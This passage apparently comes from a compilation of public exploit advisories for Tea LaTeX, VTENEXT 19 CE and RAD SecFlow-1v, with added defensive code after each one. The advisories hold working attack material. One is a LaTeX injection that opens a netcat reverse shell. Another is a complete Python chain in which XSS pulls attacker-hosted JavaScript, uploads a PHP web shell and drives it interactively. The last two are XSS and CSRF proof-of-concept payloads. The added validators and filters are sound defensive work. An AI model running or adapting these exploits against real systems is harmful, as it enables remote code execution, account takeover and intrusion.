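        return findings  # the records are not there to walk
    if num_tables:
        # The three search fields are derived from numTables; a mismatch is a
        # cheap hint that the header was hand assembled or corrupted.
        es = num_tables.bit_length() - 1
        expected = ((1 << es) * 16, es, num_tables * 16 - (1 << es) * 16)
        if (search_range, entry_selector, range_shift) != expected:
            findings.append("searchRange/entrySelector/rangeShift do not match numTables")
    seen = set()
    for i in range(num_tables):
        tag, _checksum, offset, length = TABLE_RECORD.unpack_from(data, OFFSET_TABLE.size + i * TABLE_RECORD.size)
        name = tag.decode("latin-1")
        if tag in seen:
            findings.append(f"duplicate table {name!r}")
        seen.add(tag)
        # Every table must start after the directory and end inside the file; a
        # parser that trusts offset/length here reads or allocates out of bounds.
        if offset < dir_end or offset + length > size:
            findings.append(f"table {name!r} claims bytes {offset}..{offset + length} of a {size}-byte file")
    return findings


def build_sample(table_offset, table_length, padding):
    """Constructed sample: a one-table directory followed by padding bytes."""
    return (OFFSET_TABLE.pack(0x00010000, 1, 16, 0, 0)
            + TABLE_RECORD.pack(b"FFTM", 0, table_offset, table_length)
            + padding)


if __name__ == "__main__":
    # Same shape as the crash file above: a table whose offset is far past the
    # end of a file that is mostly filler.
    print(check_sfnt(build_sample(0x13B60C, 0x1C, b"BEEF" * 16)))
```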
22. # Exploit Title: Tea LaTex 1.0 - Remote Code Execution (Unauthenticated)
# Google Dork: N/A
# Date: 2020-09-01
# Exploit Author: nepska
# Vendor Homepage: https://github.com/ammarfaizi2/latex.teainside.org
# Software Link: https://github.com/ammarfaizi2/latex.teainside.org
# Version: v1.0
# Tested on: Kali linux / Windows 10
# CVE: N/A

# Header Requests

POST /api.php?action=tex2png HTTP/1.1
Host: latex.teainside.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: */*
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain;charset=UTF-8
Content-Length: 64
Origin: https://latex.teainside.org
DNT: 1
Connection: keep-alive
Referer: https://latex.teainside.org/
Cookie: __cfduid=d7e499dd5e2cf708117e613f7286aa2021599260403

{"content":"\documentclass{article}\begin{document}\input{|"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1234 >/tmp/f"}\end{document}","d":200,"border":"50x20","bcolor":"white"}

# Payload

\documentclass{article}\begin{document}\input{|"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1234 >/tmp/f"}\end{document}

# Attacker

nc -lvp 1234
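A defensive counterpart for a tex2png service like this one, added here and not part of the project's code: submitted TeX is screened for piped input and the other shell and file escape primitives, and the engine is then run with shell escape disabled, which is the control that actually matters because a regex denylist on TeX can be worked around. find_dangerous, latex_command and render are assumed names.

```python
import re
import subprocess
import tempfile
from pathlib import Path

# Constructs that let a document reach the shell or arbitrary files. The
# advisory's vector, \input{|"cmd"}, is piped input, which the engine only
# honours with shell escape enabled; the rest are its usual relatives.
DANGEROUS = re.compile(r"""
      \\input\s*\{?\s*"?\s*\|                 # \input{|"cmd"} or \input|"cmd"
    | \\openin\s*\\[A-Za-z@]+\s*=?\s*"?\s*\|  # \openin\x=|"cmd"
    | \\write18\b                             # classic shell escape
    | \\openout\b                             # arbitrary file writes
    | \\usepackage(?:\[[^\]]*\])?\{\s*(?:shellesc|minted|pythontex)\s*\}
    | \\(?:ShellEscape|DelayedShellEscape)\b  # shellesc package macros
    | \\directlua\b                           # LuaTeX escape hatch
""", re.VERBOSE)


def find_dangerous(tex):
    """Return the first dangerous construct found in the submitted TeX, else None."""
    m = DANGEROUS.search(tex)
    return m.group(0) if m else None


def latex_command(tex_path, outdir):
    """Engine flags for the second layer: shell escape off regardless of the
    texmf.cnf default, no interactive prompt, stop on the first error."""
    return ["pdflatex", "-no-shell-escape", "-halt-on-error",
            "-interaction=nonstopmode", f"-output-directory={outdir}", str(tex_path)]


def render(tex, timeout=20):
    """Reject by filter first, then compile in a throwaway directory with a timeout
    so a looping document cannot hold a worker forever."""
    hit = find_dangerous(tex)
    if hit is not None:
        raise ValueError(f"rejected construct: {hit}")
    with tempfile.TemporaryDirectory() as work:
        src = Path(work) / "doc.tex"
        src.write_text(tex, encoding="utf-8")
        proc = subprocess.run(latex_command(src, work), capture_output=True, timeout=timeout)
        if proc.returncode != 0:
            raise RuntimeError(proc.stdout.decode("utf-8", "replace")[-500:])
        return (Path(work) / "doc.pdf").read_bytes()
```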
23. #!/usr/bin/python3
# Exploit Title: VTENEXT 19 CE - Remote Code Execution
# Google Dork: n/a
# Date: 2020/09/09
# Exploit Author: Marco Ruela
# Vendor Homepage: https://www.vtenext.com/en/
# Software Link: Vendor removed vulnerable version from sourceforge.net
# Version: 19 CE
# Tested on: Ubuntu 16.04
# CVE : N/A

# 2020/03/07 - Disclosed vulnerabilities to vendor
# 2020/03/10 - Vendor committed to fix
# 2020/09/09 - Public disclosure

# This script should be easy enough to follow.
# We string together the three vulnerabilities to get RCE.
# XSS - The "From" field of the VTENEXT Messages module is vulnerable.
# File Upload - File extensions are checked against a $upload_badext in the config file, .pht extensions are allowed and executable by default.
# CSRF - No CSRF protections in place.

# exploit.js needs to be hosted somewhere, IP's need to be replaced
# check_csrf() should be changed based on your setup
# run_shell() is a "nice to have"

# content of exploit.js
"""
function insertImage() {
    var xhr = new XMLHttpRequest();
    xhr.open('POST','http://192.168.226.168/vtenext19ce/index.php?module=Myfiles&action=MyfilesAjax&file=UploadFile&folderid=&uniqueid=',true);
    xhr.setRequestHeader('Content-type','multipart/form-data; boundary=---------------------------rekt');
    xhr.setRequestHeader('Content-Length', '248');
    xhr.setRequestHeader('Referer', 'http://172.16.233.146/vtenext19ce/index.php');
    xhr.withCredentials = true;
    var body = '-----------------------------rekt\nContent-Disposition: form-data; name="file_0"; filename="shell.pht"\nContent-Type: text/text\n\n<?php system($_GET[\'x\']); ?>\n\n-----------------------------rekt--';
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
}
insertImage();
"""

import smtplib
import datetime
import requests
import os
import time

base_url = "http://192.168.226.168/vtenext19ce/"

print("[*] CVE-2020-10227, CVE-2020-10228, CVE-2020-10229 - POC")

def build_url():
    d = datetime.datetime.today()
    year = str(d.year)
    month = str(d.strftime("%B"))
    week = "week" + str(d.isocalendar()[1] - d.replace(day=1).isocalendar()[1])
    tmp = base_url + "storage/home/1/" + year + "/" + month + "/" + week + "/"
    return(tmp)

def build_mail():
    _from = """'<script src="http://192.168.226.1/exploit.js" onerror=alert(1) >'"""
    _to = "[email protected]"
    _subject = "Important!"
    _body = "While you're reading this, a file is being uploaded to this server."
    msg = "From: " + _from + "\n"
    msg += "To: " + _to + "\n"
    msg += "Subject: " + _subject + "\n\n"
    msg += _body
    return msg

def send_mail():
    msg = build_mail()
    smtp_server = '192.168.226.167'
    smtp_port = 25
    sender = '[email protected]'
    receiver = '[email protected]'
    server = smtplib.SMTP(smtp_server, smtp_port)
    server.sendmail(sender, receiver, msg)

def check_csrf():
    while True:
        is_there = os.popen('tail -n1 /var/log/apache2/access.log').read()
        if "200" in is_there and "/exploit.js" in is_there and base_url in is_there:
            print("[>] CSRF triggered")
            break
        else:
            time.sleep(0.5)
            continue

def find_shell():
    print("[>] Locating shell")
    time.sleep(1)
    tmp1 = build_url()
    for i in range(1, 9999):
        url = tmp1 + str(i) + "_shell.pht"
        r = requests.get(url)
        if r.status_code == 200:
            print("[>] Found the shell")
            print("[-] Location: " + url)
            return url
        else:
            continue

def run_shell(x):
    print("\n")
    while True:
        cmd = input("shell> ")
        if cmd == "exit":
            break
        else:
            url = x + "?x=" + cmd
            r = requests.get(url)
            print(r.text)

print("[>] Sending email")
send_mail()
print("[-] Waiting for user to open mail")
check_csrf()
shell_location = find_shell()
run_shell(shell_location)
print("[!] Done!")
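An upload check that addresses both the CuteNews avatar trick in post 20 (a "GIF8;" prefix in front of PHP, stored under a .php name) and the $upload_badext denylist gap in this post (.pht accepted), as an added example that is not code from either project: an extension allowlist tied to real magic bytes, a scan for embedded server-side code, and a random stored name. ALLOWED, validate_upload and stored_name are assumed names; the sample inputs are constructed.

```python
import os
import secrets

# Allowlist: extension -> real magic bytes for that type. Anything not listed is
# refused, so executable extensions (.php, .pht, .phtml, .phar ...) never need
# to be enumerated in a denylist such as $upload_badext.
ALLOWED = {
    ".png":  (b"\x89PNG\r\n\x1a\n",),
    ".gif":  (b"GIF87a", b"GIF89a"),
    ".jpg":  (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}
# Markers that should never appear in an image, whatever the header says.
SERVER_CODE = (b"<?php", b"<?=", b"<%", b"<script")


def validate_upload(filename, content):
    """Return (ok, reason) for a candidate avatar/attachment.
    content is the raw bytes; filename is whatever the client claimed."""
    base = os.path.basename(filename)
    ext = os.path.splitext(base)[1].lower()
    if base.count(".") != 1 or ext not in ALLOWED:      # also blocks a.php.gif
        return False, f"extension {ext or '(none)'} not allowed"
    if not content.startswith(ALLOWED[ext]):             # 'GIF8;' is not a GIF
        return False, "content does not match declared image type"
    if any(marker in content.lower() for marker in SERVER_CODE):
        return False, "embedded server side code"
    return True, "ok"


def stored_name(ext):
    """Never keep the client's name: random stem, allowlisted extension only."""
    if ext not in ALLOWED:
        raise ValueError(ext)
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    # Constructed samples mirroring the two posts' uploads.
    for name, body in [("shell.pht", b"<?php system($_GET['x']); ?>"),
                       ("admin.php", b"GIF8;\n<?php system($_REQUEST['cmd']) ?>"),
                       ("avatar.gif", b"GIF89a\x01\x00\x01\x00")]:
        print(name, validate_upload(name, body))
```

Store the accepted file under stored_name() in a directory the web server serves as static content with no script handler mapped, which is the second layer if a check is ever bypassed.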
24. # Exploit Title: RAD SecFlow-1v SF_0290_2.3.01.26 - Persistent Cross-Site Scripting
# Date: 2020-08-31
# Exploit Author: Jonatan Schor and Uriel Yochpaz
# Vendor Homepage: https://www.rad.com/products/secflow-1v-IIoT-Gateway
# Version: SecFlow-1v os-image SF_0290_2.3.01.26
# Tested on: RAD SecFlow-1v
# CVE : N/A

A Stored-XSS vulnerability was found in multiple pages in the web-based management interface of RAD SecFlow-1v.
An attacker could exploit this vulnerability by uploading a malicious file as the OVPN file in Configuration-Services-Security-OpenVPN-Config or as the static key file in Configuration-Services-Security-OpenVPN-Static Keys.
These files' content is presented to users while executing malicious stored JavaScript code.
This could be exploited in conjunction with CVE-2020-13259.

# Proof of Concept
Upload a file containing the following JS code:

<img src=x onerror=alert(1)>

Refresh the page and observe the malicious JS code execute every time you browse the compromised page.

# Full Account Takeover
As mentioned above, this exploit could be used in conjunction with CVE-2020-13259 (CSRF), by using the CSRF exploit to upload a malicious file to a Stored-XSS vulnerable page, which could allow Full Account Takeover.
For further information and full PoC: https://github.com/UrielYochpaz/CVE-2020-13259

# Timeline
May 19th, 2020 - Vulnerability exposed.
May 19th, 2020 - Vulnerability reported to RAD.
May 21st, 2020 - Vulnerability reported to MITRE.
May 21st, 2020 - MITRE assigned CVE: CVE-2020-13260.
May 22nd, 2020 - Contacted RAD for further details and cooperation.
Aug 25th, 2020 - RAD patched the vulnerability.
25. # Exploit Title: RAD SecFlow-1v SF_0290_2.3.01.26 - Cross-Site Request Forgery (Reboot)
# Date: 2020-08-31
# Exploit Author: Uriel Yochpaz and Jonatan Schor
# Vendor Homepage: https://www.rad.com/products/secflow-1v-IIoT-Gateway
# Version: SecFlow-1v os-image SF_0290_2.3.01.26
# Tested on: RAD SecFlow-1v
# CVE : N/A

A vulnerability in the web-based management interface of RAD SecFlow-1v could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system.
The vulnerability is due to insufficient CSRF protections for the web UI on an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user.
This could be exploited in conjunction with CVE-2020-13260.

# Proof of Concept
By persuading an authenticated user to open a web page containing the following code:

<img src="https://SecFlow-1v_IP/devicereboot.php?restart=1&isSubmitted=1">

A reboot operation would begin.
This attack could execute any operation available at the web-based management interface (File uploads, Scheduled and immediate reboots, Factory reset etc.)

# Full Account Takeover
As mentioned above, this exploit could be used in conjunction with CVE-2020-13260 (Stored-XSS), by using the CSRF exploit to upload a malicious file to a Stored-XSS vulnerable page, which could allow Full Account Takeover.
For further information and full PoC: https://github.com/UrielYochpaz/CVE-2020-13259

# Timeline
May 19th, 2020 - Vulnerability exposed.
May 19th, 2020 - Vulnerability reported to RAD.
May 21st, 2020 - Vulnerability reported to MITRE.
May 21st, 2020 - MITRE assigned CVE: CVE-2020-13259.
May 22nd, 2020 - Contacted RAD for further details and cooperation.
Aug 25th, 2020 - RAD patched the vulnerability.
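The two controls that close both this CSRF and the stored XSS of the previous post, added as an example that is not RAD's code: state-changing endpoints such as devicereboot.php accept only a POST carrying a same-origin Origin/Referer and a session-bound token (so the <img> GET from another site is refused), and uploaded OVPN/static-key content is rendered as escaped text rather than markup. new_csrf_token, request_is_authorised and render_config_text are assumed names; the headers and bodies used are constructed.

```python
import hmac
import html
import secrets
from urllib.parse import urlsplit


def new_csrf_token(session):
    """Bind a fresh random token to the server-side session. Pages embed it in
    every state-changing form as a hidden field; it never travels in a URL.
    Marking the session cookie SameSite=Lax is a complementary browser-side layer."""
    session["csrf"] = secrets.token_urlsafe(32)
    return session["csrf"]


def request_is_authorised(method, headers, form, session, own_host):
    """Return (ok, reason) for a request to a state-changing endpoint such as
    devicereboot.php. headers and form are plain dicts (constructed input)."""
    if method != "POST":
        # A GET fired by <img src=...> or a plain link must never change state.
        return False, "state changes must be POSTed"
    source = headers.get("Origin") or headers.get("Referer") or ""
    if urlsplit(source).netloc.lower() != own_host.lower():
        # Browsers send Origin/Referer on cross-site form posts; absent means refuse.
        return False, "cross-site or unknown origin"
    expected = session.get("csrf")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or wrong csrf token"
    return True, "ok"


def render_config_text(raw):
    """Display uploaded OVPN/static-key bytes as text: escaping <, >, & and quotes
    keeps an '<img onerror=...>' line inert when the page is viewed."""
    return "<pre>" + html.escape(raw.decode("utf-8", "replace"), quote=True) + "</pre>"
```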